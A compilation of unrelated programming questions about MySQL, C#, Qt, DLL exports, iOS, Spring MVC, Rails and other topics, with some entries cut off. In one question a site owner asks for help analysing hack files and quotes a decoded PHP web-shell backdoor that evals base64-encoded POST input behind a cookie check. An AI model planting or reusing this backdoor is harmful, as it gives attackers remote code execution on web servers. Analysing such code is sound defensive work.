MySQL LIMIT 1 but query 15 rows?

Basically what I'm trying to do is compare the ID's of rows against 15 results in MySQL, eliminating all but 1 (using NOT IN) and then pull that result. Now normally this would be fine by itself, however the order of the 15 rows I'm doing the SQL query for are constantly changing based on a ranking, so there is a possibility that between the time the ranking updates, and the ajax request (which I submit the ID's for NOT IN) more than just one ID has changed, which would of course bring back more than one row which I do not want. So in short, is there a way in which I can query 15 rows, but only return one? Without having to run two separate queries. Any help is appreciated, thank you. EXAMPLE: Say I have 7 items in my database, and I'm displaying 5 on the page to the user. These are what are being displayed to the user: Apple Orange Kiwi Banana Grape But in the database I also have Peach Blackberry Now what I want to do is if the user deletes an item from their list, it will add another item (based on a ranking they have) Now the issue is, in order to know what they have on their list at the moment I send the remaining items to the database (say they deleted Kiwi, I would send Apple, Orange, Banana, and Grape) So now I select the highest ranked 5 items from are remaining six items, make sure they are not the ones already displayed on the page, and then add the new one to list (either Peach or Blackberry) All good and well, except that if both peach and blackberry now outrank grape, then I will be returning two results instead of just one. Because it would've searched... Apple Orange Banana Peach Blackberry and excluded... Apple Orange Banana Grape Which leaves us with both Peach and Blackberry, instead of just Peach or Blackberry

Field Members vs Method Variables?

Recently I've been thinking about performance difference between class field members and method variables. What exactly I mean is in the example below : Lets say we have a DataContext object for Linq2SQL class DataLayer { ProductDataContext context = new ProductDataContext(); public IQueryable<Product> GetData() { return context.Where(t=>t.ProductId == 2); } } In the example above, context will be stored in heap and the GetData method variables will be removed from Stack after Method is executed. So lets examine the following example to make a distinction : class DataLayer { public IQueryable<Product> GetData() { ProductDataContext context = new ProductDataContext(); return context.Where(t=>t.ProductId == 2); } } (*1) So okay first thing we know is if we define ProductDataContext instance as a field, we can reach it everywhere in the class which means we don't have to create same object instance all the time. But lets say we are talking about Asp.NET and once the users press submit button the post data is sent to the server and the events are executed and the posted data stored in a database via the method above so it is probable that the same user can send different data after one another.If I know correctly after the page is executed, the finalizers come into play and clear things from memory (from heap) and that means we lose our instance variables from memory as well and after another post, DataContext should be created once again for the new page cycle. So it seems the only benefit of declaring it publicly to the whole class is the just number one text above. Or is there something other? Thanks in advance... QListWidget drag and drop items disappearing from list

Hello, I'm having trouble implementing a QListWidget with custom items that can be reordered by dragging and dropping. The problem is when I make a fast double click (a very short drag&drop) on an item, the item sometimes disappears from the QListWidget. This is the constructor for my Widget: ListPopisiDragDrop::ListPopisiDragDrop(QWidget *parent) : QListWidget(parent) { setSelectionMode(QAbstractItemView::SingleSelection); setDragEnabled(true); viewport()->setAcceptDrops(true); setDefaultDropAction(Qt::MoveAction); setDropIndicatorShown(true); setDragDropMode(QAbstractItemView::InternalMove); } also the drop event: void ListPopisiDragDrop::dropEvent(QDropEvent *event){ int startRow=currentIndex().row(); QListWidget::dropEvent(event); int endRow=currentIndex().row(); //more code... } Custom items are made by implementing paint() and sizeHint() functions from QAbstractItemDelegate. When the problem with disappearing items happens, the dropEvent isn't even called. I really don't know what is happening and if I'm doing something wrong. Any help is appreciated. Thanks! Edit: I'm running the application on a Symbian S60 5th edition phone. Edit2: If I add this line to the constructor: setDragDropOverwriteMode(true); the item in the list still disappears, but an empty row stays in it's place.

Not all symbols of an DLL-exported class is exported (VS9)

I'm building a DLL from a group of static libraries and I'm having a problem where only parts of classes are exported. What I'm doing is declaring all symbols I want to export with a preprocessor definition like: #if defined(MYPROJ_BUILD_DLL) //Build as a DLL # define MY_API __declspec(dllexport) #elif defined(MYPROJ_USE_DLL) //Use as a DLL # define MY_API __declspec(dllimport) #else //Build or use as a static lib # define MY_API #endif For example: class MY_API Foo{ ... } I then build static library with MYPROJ_BUILD_DLL & MYPROJ_USE_DLL undefined causing a static library to be built. In another build I create a DLL from these static libraries. So I define MYPROJ_BUILD_DLL causing all symbols I want to export to be attributed with __declspec(dllexport) (this is done by including all static library headers in the DLL-project source file). Ok, so now to the problem. When I use this new DLL I get unresolved externals because not all symbols of a class is exported. For example in a class like this: class MY_API Foo{ public: Foo(char const* ); int bar(); private: Foo( char const*, char const* ); }; Only Foo::Foo( char const*, char const*); and int Foo::bar(); is exported. How can that be? I can understand if the entire class was missing, due to e.g. I forgot to include the header in the DLL-build. But it's only partial missing. Also, say if Foo::Foo( char const*) was not implemented; then the DLL build would have unresolved external errors. But the build is fine (I also double checked for declarations without implementation). Note: The combined size of the static libraries I'm combining is in the region of 30MB, and the resulting DLL is 1.2MB. I'm using Visual Studio 9.0 (2008) to build everything. And Depends to check for exported symbols.

I just cannot figure this out, it looks really simple but I'm relatively new at jsf. Why doesn't the SplitView iPhone template have a nib file for the RootView?

I'm diving into iPad development and am learning a lot quickly, but everywhere I look, I have questions. After creating a new SplitView app in Xcode using the template, it generates the AppDelegate class, RootViewController class, and DetailViewController class. Along with that, it creates a .xib files for MainWinow.xib and DetailView.xib. How do these five files work together? Why is there a nib file for the DetailView, but not the RootView? When I double click on the MainWindow.xib file, Interface Builder launches without a "View" window, why? Below is the code for didFinishLaunchingWithOptions method inside the AppDelegate class. Why are we adding the splitViewController as a subview? (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions { // Override point for customization after app launch rootViewController.managedObjectContext = self.managedObjectContext; // Add the split view controller's view to the window and display. I am confused about how to use @SessionAttributes

I am trying to understand architecture of Spring MVC. However, I am completely confused by behavior of @SessionAttributes. Please look at SampleController below , it is handling post method by SuperForm class. In fact, just field of SuperForm class is only binding as I expected. However, After I put @SessionAttributes in Controller, handling method is binding as SubAForm. PHP hack files found - help decoding and identifying

I found a handful of hack files on our web server. I managed to de-obfuscate them a bit -- they all seem to have a part that decodes into a chunk that looks like: if (!empty($_COOKIE['v']) and $_COOKIE['v']=='d'){if (!empty($_POST['c'])) {echo '<textarea rows=28 cols=80>'; $d=base64_decode(str_replace(' ','+',$_POST['c']));if($d) @eval($d); echo '</textarea>';}echo '<form action="" method=post><textarea cols=80 rows=28 name=c></textarea><br><input type=submit></form>';exit;} But this chunk (decoded above) is usually embedded into a larger code snippet. I've shared the code of one of the files in its entirety here: http://pastie.org/3753704 I can sort of see where this code is going, but definitely not an expert at PHP and could use some help figuring out more specifically what it's doing or enabling. Also, if anyone happens to be familiar with this hack, any information on how it works, and where the backdoor and other components of the hack may be hidden would be super helpful and greatly appreciated. Need help getting Wysihat to work

Hi all, I'm using Wysihat in a rails project and am stumped by it's inability to bind to my textarea named post_description (model name Post field name description). The following in the source of the posts/new HTML: <div id="post_description_editor" class="editor" contenteditable="true"></div> <textarea cols="40" id="post_description" name="post[description]" rows="20" style="display: none; "></textarea> However, when I type something in the description field and click submit the post validation fails saying the description field is empty. Anyone have any clue on how I can get this to work? Thanks in advance!

C# wrapper for objects

I'm looking for a way to create a generic wrapper for any object. The wrapper object will behave just like the class it wraps, but will be able to have more properties, variable, methods etc., for e.g. object counting, caching etc. Say the wrapper class be called Wrapper, and the class to be wrapped be called Square and has the constructor Square(double edge_len) and the properties/methods EdgeLength and Area, I would like to use it as follows: Wrapper<Square> mySquare = new Wrapper<Square>(2.5); /* or */ new Square(2.5); Console.Write("Edge {0} -> Area {1}", mySquare.EdgeLength, mySquare.Area); Obviously I can create such a wrapper class for each class I want to wrap, but I'm looking for a general solution, i.e. Wrapper<T> which can handle both primitive and compound types (although in my current situation I would be happy with just wrapping my own classes). How do I make software that preserves database integrity and correctness? Please help, confused.

i have made an application project in vs 08 c#, sql server from vs 08. the database has like 20 tables and many fields in each have made an interface for adding deleting editting and retrieving data according to predefined needs of the users. now i have to 1) make to project in to a software which i can deliver to professor. that is he can just double click the icon and the software simply starts. no vs 08 needed to start the debugging 2) the database will be on one powerful computer (dual core latest everything win xp) and the user will access it from another computer connected using LAN i am able to change the connection string to the shared database using vs 08/ debugger whenever the server changes but how am i supposed to do that when its a software? 3)there will by many clients am i supposed to give the same software to every one, so they all can connect to the database, how will the integrity and correctness of the database be maintained? i mean the db.mdf file will be in a folder which will be shared with read and write access. so its not necessary that only one user will write at a time. so is there any coding for this or? please help me out here i am stuck do not know what to do i have no practical experience, would appreciate all the help thank you

All i want to do is when subscribe button is pushed, a variable is send ( post get i dont care ) payment is completed and landed on the success page, with my variable!
